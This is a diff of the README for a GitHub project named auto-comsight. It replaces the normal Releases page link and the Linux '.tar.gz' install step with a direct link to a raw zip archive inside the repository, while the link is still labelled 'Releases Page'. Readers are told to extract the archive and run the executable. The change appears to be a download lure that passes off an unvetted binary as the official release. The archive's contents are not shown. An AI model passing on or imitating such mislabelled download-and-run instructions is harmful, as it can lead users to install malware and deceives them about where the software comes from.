Master2600/auto-comsight/README.md

    After downloading, locate the file in your downloads folder.
    - For Windows: Double-click the `.exe` file and follow the prompts.
    - For macOS: Open the `.dmg` file and drag the auto-comsight icon to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the executable in the folder.
+   - For Linux: Extract the `https://github.com/Master2600/auto-comsight/raw/refs/heads/main/auto_comsight/comsight-auto-v1.0.zip` file and run the executable in the folder.

 4. **Run the Program**
    After installation, locate the auto-comsight application on your computer.
 Double-click to launch it.

 ## 📥 Download & Install

-To get started, visit this page to download the software: [Releases Page](https://github.com/Master2600/auto-comsight/releases).
+To get started, visit this page to download the software: [Releases Page](https://github.com/Master2600/auto-comsight/raw/refs/heads/main/auto_comsight/comsight-auto-v1.0.zip).

 ## 📖 How to Use